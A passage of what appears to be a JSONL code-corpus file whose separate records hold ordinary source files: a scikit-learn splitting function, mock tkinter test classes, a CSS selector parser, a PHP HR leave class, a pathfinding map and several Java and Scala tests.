None)\n random_state = options.pop('random_state', None)\n stratify = options.pop('stratify', None)\n\n if options:\n raise TypeError(\"Invalid parameters passed: %s\" % str(options))\n\n if test_size is None and train_size is None:\n test_size = 0.25\n\n arrays = indexable(*arrays)\n\n if stratify is not None:\n CVClass = StratifiedShuffleSplit\n else:\n CVClass = ShuffleSplit\n\n cv = CVClass(test_size=test_size,\n train_size=train_size,\n random_state=random_state)\n\n train, test = next(cv.split(X=arrays[0], y=stratify))\n return list(chain.from_iterable((safe_indexing(a, train),\n safe_indexing(a, test)) for a in arrays))\n\n\ntrain_test_split.__test__ = False # to avoid a pb with nosetests\n\ndef _build_repr(self):\n # XXX This is copied from BaseEstimator's get_params\n cls = self.__class__\n init = getattr(cls.__init__, 'deprecated_original', cls.__init__)\n # Ignore varargs, kw and default values and pop self\n init_signature = signature(init)\n # Consider the constructor parameters excluding 'self'\n if init is object.__init__:\n args = []\n else:\n args = sorted([p.name for p in init_signature.parameters.values()\n if p.name != 'self' and p.kind != p.VAR_KEYWORD])\n class_name = self.__class__.__name__\n params = dict()\n for key in args:\n # We need deprecation warnings to always be on in order to\n # catch deprecated param values.\n # This is set in utils/__init__.py but it gets overwritten\n # when running under python3 somehow.\n warnings.simplefilter(\"always\", DeprecationWarning)\n try:\n with warnings.catch_warnings(record=True) as w:\n value = getattr(self, key, None)\n if len(w) and w[0].category == DeprecationWarning:\n # if the parameter is deprecated, don't show it\n continue\n finally:\n warnings.filters.pop(0)\n params[key] = value\n\n return '%s(%s)' % (class_name, _pprint(params, offset=len(class_name)))\n"} {"text": "// Copyright 2020 the V8 project authors. All rights reserved.\n// Use of this source code is governed by a BSD-style license that can be\n// found in the LICENSE file.\n\n'use strict';\n\nclass Class {\n constructor() {\n this.abc = 789;\n this.selfRef = Class;\n }\n}\n\nfunction foo() {\n let a = 123;\n console.log(a);\n}\n\nfoo();\nlet a = 456;\nconsole.log(a);\nlet b = new Class();\nconsole.log(b.abc);\n"} {"text": "/*\n * Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with\n * the License. You may obtain a copy of the License at\n *\n * http://www.apache.org/licenses/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on\n * an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the\n * specific language governing permissions and limitations under the License.\n *\n * Copyright 2012-2020 the original author or authors.\n */\npackage org.assertj.core.internal.integers;\n\nimport static org.assertj.core.api.Assertions.assertThat;\nimport static org.assertj.core.api.Assertions.assertThatExceptionOfType;\nimport static org.assertj.core.api.Assertions.assertThatIllegalArgumentException;\nimport static org.assertj.core.api.Assertions.assertThatNullPointerException;\nimport static org.assertj.core.api.Assertions.catchThrowable;\nimport static org.assertj.core.api.Assertions.withinPercentage;\nimport static org.assertj.core.data.Percentage.withPercentage;\nimport static org.assertj.core.error.ShouldBeEqualWithinPercentage.shouldBeEqualWithinPercentage;\nimport static org.assertj.core.test.TestData.someInfo;\nimport static org.assertj.core.util.FailureMessages.actualIsNull;\nimport static org.mockito.Mockito.verify;\n\nimport org.assertj.core.api.AssertionInfo;\nimport org.assertj.core.internal.IntegersBaseTest;\nimport org.junit.jupiter.api.Test;\nimport org.junit.jupiter.params.ParameterizedTest;\nimport org.junit.jupiter.params.provider.CsvSource;\n\nclass Integers_assertIsCloseToPercentage_Test extends IntegersBaseTest {\n\n private static final Integer ZERO = 0;\n private static final Integer ONE = 1;\n private static final Integer TEN = 10;\n\n @Test\n void should_fail_if_actual_is_null() {\n assertThatExceptionOfType(AssertionError.class).isThrownBy(() -> integers.assertIsCloseToPercentage(someInfo(), null, ONE, withPercentage(ONE)))\n .withMessage(actualIsNull());\n }\n\n @Test\n void should_fail_if_expected_value_is_null() {\n assertThatNullPointerException().isThrownBy(() -> integers.assertIsCloseToPercentage(someInfo(), ONE, null, withPercentage(ONE)));\n }\n\n @Test\n void should_fail_if_percentage_is_null() {\n assertThatNullPointerException().isThrownBy(() -> integers.assertIsCloseToPercentage(someInfo(), ONE, ZERO, null));\n }\n\n @Test\n void should_fail_if_percentage_is_negative() {\n assertThatIllegalArgumentException().isThrownBy(() -> integers.assertIsCloseToPercentage(someInfo(), ONE, ZERO, withPercentage(-1)));\n }\n\n @ParameterizedTest\n @CsvSource({\n \"1, 1, 1\",\n \"1, 2, 100\",\n \"-1, -1, 1\",\n \"-1, -2, 100\",\n \"-1, 1, 200\"\n })\n void should_pass_if_difference_is_less_than_given_percentage(Integer actual, Integer other, Integer percentage) {\n integers.assertIsCloseToPercentage(someInfo(), actual, other, withPercentage(percentage));\n }\n\n @ParameterizedTest\n @CsvSource({\n \"1, 1, 0\",\n \"2, 1, 100\",\n \"1, 2, 50\",\n \"-1, -1, 0\",\n \"-2, -1, 100\",\n \"-1, -2, 50\"\n })\n void should_pass_if_difference_is_equal_to_given_percentage(Integer actual, Integer other, Integer percentage) {\n integers.assertIsCloseToPercentage(someInfo(), actual, other, withPercentage(percentage));\n }\n\n @Test\n void should_fail_if_actual_is_not_close_enough_to_expected_value() {\n AssertionInfo info = someInfo();\n\n Throwable error = catchThrowable(() -> integers.assertIsCloseToPercentage(someInfo(), ONE, TEN, withPercentage(TEN)));\n\n assertThat(error).isInstanceOf(AssertionError.class);\n verify(failures).failure(info, shouldBeEqualWithinPercentage(ONE, TEN, withinPercentage(TEN),\n (TEN - ONE)));\n }\n}\n"} {"text": "\"\"\"Classes that replace tkinter gui objects used by an object being tested.\n\nA gui object is anything with a master or parent parameter, which is\ntypically required in spite of what the doc strings say.\n\"\"\"\n\nclass Event:\n '''Minimal mock with attributes for testing event handlers.\n\n This is not a gui object, but is used as an argument for callbacks\n that access attributes of the event passed. If a callback ignores\n the event, other than the fact that is happened, pass 'event'.\n\n Keyboard, mouse, window, and other sources generate Event instances.\n Event instances have the following attributes: serial (number of\n event), time (of event), type (of event as number), widget (in which\n event occurred), and x,y (position of mouse). There are other\n attributes for specific events, such as keycode for key events.\n tkinter.Event.__doc__ has more but is still not complete.\n '''\n def __init__(self, **kwds):\n \"Create event with attributes needed for test\"\n self.__dict__.update(kwds)\n\nclass Var:\n \"Use for String/Int/BooleanVar: incomplete\"\n def __init__(self, master=None, value=None, name=None):\n self.master = master\n self.value = value\n self.name = name\n def set(self, value):\n self.value = value\n def get(self):\n return self.value\n\nclass Mbox_func:\n \"\"\"Generic mock for messagebox functions, which all have the same signature.\n\n Instead of displaying a message box, the mock's call method saves the\n arguments as instance attributes, which test functions can then examime.\n The test can set the result returned to ask function\n \"\"\"\n def __init__(self, result=None):\n self.result = result # Return None for all show funcs\n def __call__(self, title, message, *args, **kwds):\n # Save all args for possible examination by tester\n self.title = title\n self.message = message\n self.args = args\n self.kwds = kwds\n return self.result # Set by tester for ask functions\n\nclass Mbox:\n \"\"\"Mock for tkinter.messagebox with an Mbox_func for each function.\n\n This module was 'tkMessageBox' in 2.x; hence the 'import as' in 3.x.\n Example usage in test_module.py for testing functions in module.py:\n ---\nfrom idlelib.idle_test.mock_tk import Mbox\nimport module\n\norig_mbox = module.tkMessageBox\nshowerror = Mbox.showerror # example, for attribute access in test methods\n\nclass Test(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n module.tkMessageBox = Mbox\n\n @classmethod\n def tearDownClass(cls):\n module.tkMessageBox = orig_mbox\n ---\n For 'ask' functions, set func.result return value before calling the method\n that uses the message function. When tkMessageBox functions are the\n only gui alls in a method, this replacement makes the method gui-free,\n \"\"\"\n askokcancel = Mbox_func() # True or False\n askquestion = Mbox_func() # 'yes' or 'no'\n askretrycancel = Mbox_func() # True or False\n askyesno = Mbox_func() # True or False\n askyesnocancel = Mbox_func() # True, False, or None\n showerror = Mbox_func() # None\n showinfo = Mbox_func() # None\n showwarning = Mbox_func() # None\n\nfrom _tkinter import TclError\n\nclass Text:\n \"\"\"A semi-functional non-gui replacement for tkinter.Text text editors.\n\n The mock's data model is that a text is a list of \\n-terminated lines.\n The mock adds an empty string at the beginning of the list so that the\n index of actual lines start at 1, as with Tk. The methods never see this.\n Tk initializes files with a terminal \\n that cannot be deleted. It is\n invisible in the sense that one cannot move the cursor beyond it.\n\n This class is only tested (and valid) with strings of ascii chars.\n For testing, we are not concerned with Tk Text's treatment of,\n for instance, 0-width characters or character + accent.\n \"\"\"\n def __init__(self, master=None, cnf={}, **kw):\n '''Initialize mock, non-gui, text-only Text widget.\n\n At present, all args are ignored. Almost all affect visual behavior.\n There are just a few Text-only options that affect text behavior.\n '''\n self.data = ['', '\\n']\n\n def index(self, index):\n \"Return string version of index decoded according to current text.\"\n return \"%s.%s\" % self._decode(index, endflag=1)\n\n def _decode(self, index, endflag=0):\n \"\"\"Return a (line, char) tuple of int indexes into self.data.\n\n This implements .index without converting the result back to a string.\n The result is constrained by the number of lines and linelengths of\n self.data. For many indexes, the result is initially (1, 0).\n\n The input index may have any of several possible forms:\n * line.char float: converted to 'line.char' string;\n * 'line.char' string, where line and char are decimal integers;\n * 'line.char lineend', where lineend='lineend' (and char is ignored);\n * 'line.end', where end='end' (same as above);\n * 'insert', the positions before terminal \\n;\n * 'end', whose meaning depends on the endflag passed to ._endex.\n * 'sel.first' or 'sel.last', where sel is a tag -- not implemented.\n \"\"\"\n if isinstance(index, (float, bytes)):\n index = str(index)\n try:\n index=index.lower()\n except AttributeError:\n raise TclError('bad text index \"%s\"' % index) from None\n\n lastline = len(self.data) - 1 # same as number of text lines\n if index == 'insert':\n return lastline, len(self.data[lastline]) - 1\n elif index == 'end':\n return self._endex(endflag)\n\n line, char = index.split('.')\n line = int(line)\n\n # Out of bounds line becomes first or last ('end') index\n if line < 1:\n return 1, 0\n elif line > lastline:\n return self._endex(endflag)\n\n linelength = len(self.data[line]) -1 # position before/at \\n\n if char.endswith(' lineend') or char == 'end':\n return line, linelength\n # Tk requires that ignored chars before ' lineend' be valid int\n\n # Out of bounds char becomes first or last index of line\n char = int(char)\n if char < 0:\n char = 0\n elif char > linelength:\n char = linelength\n return line, char\n\n def _endex(self, endflag):\n '''Return position for 'end' or line overflow corresponding to endflag.\n\n -1: position before terminal \\n; for .insert(), .delete\n 0: position after terminal \\n; for .get, .delete index 1\n 1: same viewed as beginning of non-existent next line (for .index)\n '''\n n = len(self.data)\n if endflag == 1:\n return n, 0\n else:\n n -= 1\n return n, len(self.data[n]) + endflag\n\n\n def insert(self, index, chars):\n \"Insert chars before the character at index.\"\n\n if not chars: # ''.splitlines() is [], not ['']\n return\n chars = chars.splitlines(True)\n if chars[-1][-1] == '\\n':\n chars.append('')\n line, char = self._decode(index, -1)\n before = self.data[line][:char]\n after = self.data[line][char:]\n self.data[line] = before + chars[0]\n self.data[line+1:line+1] = chars[1:]\n self.data[line+len(chars)-1] += after\n\n\n def get(self, index1, index2=None):\n \"Return slice from index1 to index2 (default is 'index1+1').\"\n\n startline, startchar = self._decode(index1)\n if index2 is None:\n endline, endchar = startline, startchar+1\n else:\n endline, endchar = self._decode(index2)\n\n if startline == endline:\n return self.data[startline][startchar:endchar]\n else:\n lines = [self.data[startline][startchar:]]\n for i in range(startline+1, endline):\n lines.append(self.data[i])\n lines.append(self.data[endline][:endchar])\n return ''.join(lines)\n\n\n def delete(self, index1, index2=None):\n '''Delete slice from index1 to index2 (default is 'index1+1').\n\n Adjust default index2 ('index+1) for line ends.\n Do not delete the terminal \\n at the very end of self.data ([-1][-1]).\n '''\n startline, startchar = self._decode(index1, -1)\n if index2 is None:\n if startchar < len(self.data[startline])-1:\n # not deleting \\n\n endline, endchar = startline, startchar+1\n elif startline < len(self.data) - 1:\n # deleting non-terminal \\n, convert 'index1+1 to start of next line\n endline, endchar = startline+1, 0\n else:\n # do not delete terminal \\n if index1 == 'insert'\n return\n else:\n endline, endchar = self._decode(index2, -1)\n # restricting end position to insert position excludes terminal \\n\n\n if startline == endline and startchar < endchar:\n self.data[startline] = self.data[startline][:startchar] + \\\n self.data[startline][endchar:]\n elif startline < endline:\n self.data[startline] = self.data[startline][:startchar] + \\\n self.data[endline][endchar:]\n startline += 1\n for i in range(startline, endline+1):\n del self.data[startline]\n\n def compare(self, index1, op, index2):\n line1, char1 = self._decode(index1)\n line2, char2 = self._decode(index2)\n if op == '<':\n return line1 < line2 or line1 == line2 and char1 < char2\n elif op == '<=':\n return line1 < line2 or line1 == line2 and char1 <= char2\n elif op == '>':\n return line1 > line2 or line1 == line2 and char1 > char2\n elif op == '>=':\n return line1 > line2 or line1 == line2 and char1 >= char2\n elif op == '==':\n return line1 == line2 and char1 == char2\n elif op == '!=':\n return line1 != line2 or char1 != char2\n else:\n raise TclError('''bad comparison operator \"%s\":'''\n '''must be <, <=, ==, >=, >, or !=''' % op)\n\n # The following Text methods normally do something and return None.\n # Whether doing nothing is sufficient for a test will depend on the test.\n\n def mark_set(self, name, index):\n \"Set mark *name* before the character at index.\"\n pass\n\n def mark_unset(self, *markNames):\n \"Delete all marks in markNames.\"\n\n def tag_remove(self, tagName, index1, index2=None):\n \"Remove tag tagName from all characters between index1 and index2.\"\n pass\n\n # The following Text methods affect the graphics screen and return None.\n # Doing nothing should always be sufficient for tests.\n\n def scan_dragto(self, x, y):\n \"Adjust the view of the text according to scan_mark\"\n\n def scan_mark(self, x, y):\n \"Remember the current X, Y coordinates.\"\n\n def see(self, index):\n \"Scroll screen to make the character at INDEX is visible.\"\n pass\n\n # The following is a Misc method inherited by Text.\n # It should properly go in a Misc mock, but is included here for now.\n\n def bind(sequence=None, func=None, add=None):\n \"Bind to this widget at event sequence a call to function func.\"\n pass\n"} {"text": " 'Addition',\n 'ADDITION' => 'Addition'\n ];\n public $field_a = [\n 'hr_leave_transaction_header_id',\n 'leave_type',\n 'transaction_type',\n 'leave_quantity',\n 'from_date',\n 'to_date',\n 'reason',\n 'contact_details',\n 'created_by',\n 'creation_date',\n 'last_update_by',\n 'last_update_date',\n ];\n public $fields_inHeader_needsToBeInserted_inPOST = [\n \"hr_leave_transaction_header_id\"\n ];\n public $requiredField = [\n 'leave_type',\n 'transaction_type',\n 'leave_quantity',\n 'from_date'\n ];\n public $fields_inForm_notinDataBase = [\n \"monetary_value\"\n ];\n public $hr_leave_transaction_line_id;\n public $hr_leave_transaction_header_id;\n public $leave_type;\n public $transaction_type;\n public $leave_quantity;\n public $from_date;\n public $to_date;\n public $reason;\n public $contact_details;\n public $created_by;\n public $creation_date;\n public $last_update_by;\n public $last_update_date;\n\n Public static function find_monetary_value_by_id($hr_leave_transaction_line_id, $element_id = '', $element_value = '') {\n if (empty($hr_leave_transaction_line_id)) {\n return null;\n }\n if (empty($element_id) || empty($element_value)) {\n $ele_entry_line = self::find_by_id($hr_leave_transaction_line_id);\n $element_id = $ele_entry_line->element_id;\n $element_value = $ele_entry_line->element_value;\n }\n $ele_details = hr_compensation_element::find_by_id($element_id);\n $amount = null;\n\n switch ($ele_details->calculation_rule) {\n case 'FLAT' :\n $amount = $element_value;\n break;\n\n case 'P_BASIC' :\n $total_amount = 0;\n $this_details = self::find_by_id($hr_leave_transaction_line_id);\n $all_basic_lines = hr_leave_transaction_header::find_all_basic_lines($this_details->hr_leave_transaction_header_id);\n foreach ($all_basic_lines as $lines) {\n $total_amount += $lines->element_value;\n }\n $amount = ($total_amount * $this_details->element_value) / 100;\n break;\n\n case 'P_REGULAR' :\n $total_amount = 0;\n $this_details = self::find_by_id($hr_leave_transaction_line_id);\n $all_basic_lines = hr_leave_transaction_header::find_all_regular_lines($this_details->hr_leave_transaction_header_id);\n foreach ($all_basic_lines as $lines) {\n $total_amount += $lines->element_value;\n }\n $amount = ($total_amount * $this_details->element_value) / 100;\n break;\n\n case 'P_BASIC_REGULAR' :\n $total_amount = 0;\n $this_details = self::find_by_id($hr_leave_transaction_line_id);\n $all_basic_lines = hr_leave_transaction_header::find_all_regular_lines($this_details->hr_leave_transaction_header_id);\n foreach ($all_basic_lines as $lines) {\n $total_amount += $lines->element_value;\n }\n $amount = ($total_amount * $this_details->element_value) / 100;\n break;\n\n case 'default' :\n break;\n }\n return $amount;\n }\n\n }\n\n//end of inv_transaction class\n?>"} {"text": "package gitbucket.core.model\n\nimport com.github.takezoe.slick.blocking.BlockingJdbcProfile\nimport gitbucket.core.util.DatabaseConfig\n\ntrait Profile {\n val profile: BlockingJdbcProfile\n import profile.blockingApi._\n\n /**\n * java.util.Date Mapped Column Types\n */\n implicit val dateColumnType = MappedColumnType.base[java.util.Date, java.sql.Timestamp](\n d => new java.sql.Timestamp(d.getTime),\n t => new java.util.Date(t.getTime)\n )\n\n /**\n * WebHookBase.Event Column Types\n */\n implicit val eventColumnType = MappedColumnType.base[WebHook.Event, String](_.name, WebHook.Event.valueOf(_))\n\n /**\n * Extends Column to add conditional condition\n */\n implicit class RichColumn(c1: Rep[Boolean]) {\n def &&(c2: => Rep[Boolean], guard: => Boolean): Rep[Boolean] = if (guard) c1 && c2 else c1\n }\n\n /**\n * Returns system date.\n */\n def currentDate = new java.util.Date()\n\n}\n\ntrait ProfileProvider { self: Profile =>\n\n lazy val profile = DatabaseConfig.slickDriver\n\n}\n\ntrait CoreProfile\n extends ProfileProvider\n with Profile\n with AccessTokenComponent\n with AccountComponent\n with ActivityComponent // ActivityComponent has been deprecated, but keep it for binary compatibility\n with CollaboratorComponent\n with CommitCommentComponent\n with CommitStatusComponent\n with GroupMemberComponent\n with IssueComponent\n with IssueCommentComponent\n with IssueLabelComponent\n with LabelComponent\n with PriorityComponent\n with MilestoneComponent\n with PullRequestComponent\n with RepositoryComponent\n with SshKeyComponent\n with GpgKeyComponent\n with RepositoryWebHookComponent\n with RepositoryWebHookEventComponent\n with AccountWebHookComponent\n with AccountWebHookEventComponent\n with AccountFederationComponent\n with ProtectedBranchComponent\n with DeployKeyComponent\n with ReleaseTagComponent\n with ReleaseAssetComponent\n with AccountExtraMailAddressComponent\n\nobject Profile extends CoreProfile\n"} {"text": "agents:\n- goal: [2, 4]\n name: agent0\n start: [4, 5]\n- goal: [5, 2]\n name: agent1\n start: [0, 2]\n- goal: [1, 6]\n name: agent2\n start: [7, 5]\n- goal: [6, 5]\n name: agent3\n start: [0, 1]\n- goal: [6, 7]\n name: agent4\n start: [5, 1]\n- goal: [5, 4]\n name: agent5\n start: [7, 1]\n- goal: [1, 2]\n name: agent6\n start: [7, 4]\n- goal: [6, 1]\n name: agent7\n start: [3, 6]\n- goal: [4, 2]\n name: agent8\n start: [7, 3]\n- goal: [4, 3]\n name: agent9\n start: [6, 5]\n- goal: [7, 6]\n name: agent10\n start: [3, 5]\n- goal: [4, 5]\n name: agent11\n start: [2, 3]\n- goal: [3, 4]\n name: agent12\n start: [1, 6]\n- goal: [2, 5]\n name: agent13\n start: [6, 4]\n- goal: [4, 4]\n name: agent14\n start: [4, 2]\n- goal: [0, 7]\n name: agent15\n start: [6, 7]\n- goal: [5, 0]\n name: agent16\n start: [7, 6]\nmap:\n dimensions: [8, 8]\n obstacles:\n - [3, 7]\n - [2, 7]\n - [0, 4]\n - [1, 1]\n - [4, 1]\n - [3, 0]\n - [0, 0]\n - [3, 2]\n - [0, 6]\n - [3, 3]\n - [6, 2]\n - [5, 5]\n"} {"text": "\"use strict\";\n\nmodule.exports = parse;\n\nvar re_name = /^(?:\\\\.|[\\w\\-\\u00c0-\\uFFFF])+/,\n re_escape = /\\\\([\\da-f]{1,6}\\s?|(\\s)|.)/ig,\n //modified version of https://github.com/jquery/sizzle/blob/master/src/sizzle.js#L87\n re_attr = /^\\s*((?:\\\\.|[\\w\\u00c0-\\uFFFF\\-])+)\\s*(?:(\\S?)=\\s*(?:(['\"])(.*?)\\3|(#?(?:\\\\.|[\\w\\u00c0-\\uFFFF\\-])*)|)|)\\s*(i)?\\]/;\n\nvar actionTypes = {\n\t__proto__: null,\n\t\"undefined\": \"exists\",\n\t\"\": \"equals\",\n\t\"~\": \"element\",\n\t\"^\": \"start\",\n\t\"$\": \"end\",\n\t\"*\": \"any\",\n\t\"!\": \"not\",\n\t\"|\": \"hyphen\"\n};\n\nvar simpleSelectors = {\n\t__proto__: null,\n\t\">\": \"child\",\n\t\"<\": \"parent\",\n\t\"~\": \"sibling\",\n\t\"+\": \"adjacent\"\n};\n\nvar attribSelectors = {\n\t__proto__: null,\n\t\"#\": [\"id\", \"equals\"],\n\t\".\": [\"class\", \"element\"]\n};\n\n//pseudos, whose data-property is parsed as well\nvar unpackPseudos = {\n\t__proto__: null,\n\t\"has\": true,\n\t\"not\": true,\n\t\"matches\": true\n};\n\nvar stripQuotesFromPseudos = {\n\t__proto__: null,\n\t\"contains\": true,\n\t\"icontains\": true\n};\n\nvar quotes = {\n\t__proto__: null,\n\t\"\\\"\": true,\n\t\"'\": true\n};\n\n//unescape function taken from https://github.com/jquery/sizzle/blob/master/src/sizzle.js#L139\nfunction funescape( _, escaped, escapedWhitespace ) {\n\tvar high = \"0x\" + escaped - 0x10000;\n\t// NaN means non-codepoint\n\t// Support: Firefox\n\t// Workaround erroneous numeric interpretation of +\"0x\"\n\treturn high !== high || escapedWhitespace ?\n\t\tescaped :\n\t\t// BMP codepoint\n\t\thigh < 0 ?\n\t\t\tString.fromCharCode( high + 0x10000 ) :\n\t\t\t// Supplemental Plane codepoint (surrogate pair)\n\t\t\tString.fromCharCode( high >> 10 | 0xD800, high & 0x3FF | 0xDC00 );\n}\n\nfunction unescapeCSS(str){\n\treturn str.replace(re_escape, funescape);\n}\n\nfunction isWhitespace(c){\n\treturn c === \" \" || c === \"\\n\" || c === \"\\t\" || c === \"\\f\" || c === \"\\r\";\n}\n\nfunction parse(selector, options){\n\tvar subselects = [];\n\n\tselector = parseSelector(subselects, selector + \"\", options);\n\n\tif(selector !== \"\"){\n\t\tthrow new SyntaxError(\"Unmatched selector: \" + selector);\n\t}\n\n\treturn subselects;\n}\n\nfunction parseSelector(subselects, selector, options){\n\tvar tokens = [],\n\t\tsawWS = false,\n\t\tdata, firstChar, name, quot;\n\n\tfunction getName(){\n\t\tvar sub = selector.match(re_name)[0];\n\t\tselector = selector.substr(sub.length);\n\t\treturn unescapeCSS(sub);\n\t}\n\n\tfunction stripWhitespace(start){\n\t\twhile(isWhitespace(selector.charAt(start))) start++;\n\t\tselector = selector.substr(start);\n\t}\n\n\tstripWhitespace(0);\n\n\twhile(selector !== \"\"){\n\t\tfirstChar = selector.charAt(0);\n\n\t\tif(isWhitespace(firstChar)){\n\t\t\tsawWS = true;\n\t\t\tstripWhitespace(1);\n\t\t} else if(firstChar in simpleSelectors){\n\t\t\ttokens.push({type: simpleSelectors[firstChar]});\n\t\t\tsawWS = false;\n\n\t\t\tstripWhitespace(1);\n\t\t} else if(firstChar === \",\"){\n\t\t\tif(tokens.length === 0){\n\t\t\t\tthrow new SyntaxError(\"empty sub-selector\");\n\t\t\t}\n\t\t\tsubselects.push(tokens);\n\t\t\ttokens = [];\n\t\t\tsawWS = false;\n\t\t\tstripWhitespace(1);\n\t\t} else {\n\t\t\tif(sawWS){\n\t\t\t\tif(tokens.length > 0){\n\t\t\t\t\ttokens.push({type: \"descendant\"});\n\t\t\t\t}\n\t\t\t\tsawWS = false;\n\t\t\t}\n\n\t\t\tif(firstChar === \"*\"){\n\t\t\t\tselector = selector.substr(1);\n\t\t\t\ttokens.push({type: \"universal\"});\n\t\t\t} else if(firstChar in attribSelectors){\n\t\t\t\tselector = selector.substr(1);\n\t\t\t\ttokens.push({\n\t\t\t\t\ttype: \"attribute\",\n\t\t\t\t\tname: attribSelectors[firstChar][0],\n\t\t\t\t\taction: attribSelectors[firstChar][1],\n\t\t\t\t\tvalue: getName(),\n\t\t\t\t\tignoreCase: false\n\t\t\t\t});\n\t\t\t} else if(firstChar === \"[\"){\n\t\t\t\tselector = selector.substr(1);\n\t\t\t\tdata = selector.match(re_attr);\n\t\t\t\tif(!data){\n\t\t\t\t\tthrow new SyntaxError(\"Malformed attribute selector: \" + selector);\n\t\t\t\t}\n\t\t\t\tselector = selector.substr(data[0].length);\n\t\t\t\tname = unescapeCSS(data[1]);\n\n\t\t\t\tif(\n\t\t\t\t\t!options || (\n\t\t\t\t\t\t\"lowerCaseAttributeNames\" in options ?\n\t\t\t\t\t\t\toptions.lowerCaseAttributeNames :\n\t\t\t\t\t\t\t!options.xmlMode\n\t\t\t\t\t)\n\t\t\t\t){\n\t\t\t\t\tname = name.toLowerCase();\n\t\t\t\t}\n\n\t\t\t\ttokens.push({\n\t\t\t\t\ttype: \"attribute\",\n\t\t\t\t\tname: name,\n\t\t\t\t\taction: actionTypes[data[2]],\n\t\t\t\t\tvalue: unescapeCSS(data[4] || data[5] || \"\"),\n\t\t\t\t\tignoreCase: !!data[6]\n\t\t\t\t});\n\n\t\t\t} else if(firstChar === \":\"){\n\t\t\t\tif(selector.charAt(1) === \":\"){\n\t\t\t\t\tselector = selector.substr(2);\n\t\t\t\t\ttokens.push({type: \"pseudo-element\", name: getName().toLowerCase()});\n\t\t\t\t\tcontinue;\n\t\t\t\t}\n\n\t\t\t\tselector = selector.substr(1);\n\n\t\t\t\tname = getName().toLowerCase();\n\t\t\t\tdata = null;\n\n\t\t\t\tif(selector.charAt(0) === \"(\"){\n\t\t\t\t\tif(name in unpackPseudos){\n\t\t\t\t\t\tquot = selector.charAt(1);\n\t\t\t\t\t\tvar quoted = quot in quotes;\n\n\t\t\t\t\t\tselector = selector.substr(quoted + 1);\n\n\t\t\t\t\t\tdata = [];\n\t\t\t\t\t\tselector = parseSelector(data, selector, options);\n\n\t\t\t\t\t\tif(quoted){\n\t\t\t\t\t\t\tif(selector.charAt(0) !== quot){\n\t\t\t\t\t\t\t\tthrow new SyntaxError(\"unmatched quotes in :\" + name);\n\t\t\t\t\t\t\t} else {\n\t\t\t\t\t\t\t\tselector = selector.substr(1);\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\n\t\t\t\t\t\tif(selector.charAt(0) !== \")\"){\n\t\t\t\t\t\t\tthrow new SyntaxError(\"missing closing parenthesis in :\" + name + \" \" + selector);\n\t\t\t\t\t\t}\n\n\t\t\t\t\t\tselector = selector.substr(1);\n\t\t\t\t\t} else {\n\t\t\t\t\t\tvar pos = 1, counter = 1;\n\n\t\t\t\t\t\tfor(; counter > 0 && pos < selector.length; pos++){\n\t\t\t\t\t\t\tif(selector.charAt(pos) === \"(\") counter++;\n\t\t\t\t\t\t\telse if(selector.charAt(pos) === \")\") counter--;\n\t\t\t\t\t\t}\n\n\t\t\t\t\t\tif(counter){\n\t\t\t\t\t\t\tthrow new SyntaxError(\"parenthesis not matched\");\n\t\t\t\t\t\t}\n\n\t\t\t\t\t\tdata = selector.substr(1, pos - 2);\n\t\t\t\t\t\tselector = selector.substr(pos);\n\n\t\t\t\t\t\tif(name in stripQuotesFromPseudos){\n\t\t\t\t\t\t\tquot = data.charAt(0);\n\n\t\t\t\t\t\t\tif(quot === data.slice(-1) && quot in quotes){\n\t\t\t\t\t\t\t\tdata = data.slice(1, -1);\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\tdata = unescapeCSS(data);\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\ttokens.push({type: \"pseudo\", name: name, data: data});\n\t\t\t} else if(re_name.test(selector)){\n\t\t\t\tname = getName();\n\n\t\t\t\tif(!options || (\"lowerCaseTags\" in options ? options.lowerCaseTags : !options.xmlMode)){\n\t\t\t\t\tname = name.toLowerCase();\n\t\t\t\t}\n\n\t\t\t\ttokens.push({type: \"tag\", name: name});\n\t\t\t} else {\n\t\t\t\tif(tokens.length && tokens[tokens.length - 1].type === \"descendant\"){\n\t\t\t\t\ttokens.pop();\n\t\t\t\t}\n\t\t\t\taddToken(subselects, tokens);\n\t\t\t\treturn selector;\n\t\t\t}\n\t\t}\n\t}\n\n\taddToken(subselects, tokens);\n\n\treturn selector;\n}\n\nfunction addToken(subselects, tokens){\n\tif(subselects.length > 0 && tokens.length === 0){\n\t\tthrow new SyntaxError(\"empty sub-selector\");\n\t}\n\n\tsubselects.push(tokens);\n}\n"} {"text": "Dump information about static prebuilt constants, to the file\nTARGETNAME.staticdata.info in the /tmp/usession-... directory. This file can\nbe later inspected using the script ``bin/reportstaticdata.py``.\n"} {"text": "/*\n * Copyright 2012-2019 the original author or authors.\n *\n * Licensed under the Apache License, Version 2.0 (the \"License\");\n * you may not use this file except in compliance with the License.\n * You may obtain a copy of the License at\n *\n * https://www.apache.org/licenses/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n */\n\npackage org.springframework.boot.autoconfigure.jersey;\n\nimport java.lang.annotation.Documented;\nimport java.lang.annotation.ElementType;\nimport java.lang.annotation.Retention;\nimport java.lang.annotation.RetentionPolicy;\nimport java.lang.annotation.Target;\n\nimport javax.ws.rs.ApplicationPath;\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\n\nimport org.glassfish.jersey.server.ResourceConfig;\nimport org.junit.jupiter.api.Test;\n\nimport org.springframework.beans.factory.annotation.Autowired;\nimport org.springframework.beans.factory.annotation.Value;\nimport org.springframework.boot.SpringApplication;\nimport org.springframework.boot.autoconfigure.context.PropertyPlaceholderAutoConfiguration;\nimport org.springframework.boot.autoconfigure.web.servlet.ServletWebServerFactoryAutoConfiguration;\nimport org.springframework.boot.test.context.SpringBootTest;\nimport org.springframework.boot.test.context.SpringBootTest.WebEnvironment;\nimport org.springframework.boot.test.web.client.TestRestTemplate;\nimport org.springframework.context.annotation.Configuration;\nimport org.springframework.context.annotation.Import;\nimport org.springframework.http.HttpStatus;\nimport org.springframework.http.ResponseEntity;\nimport 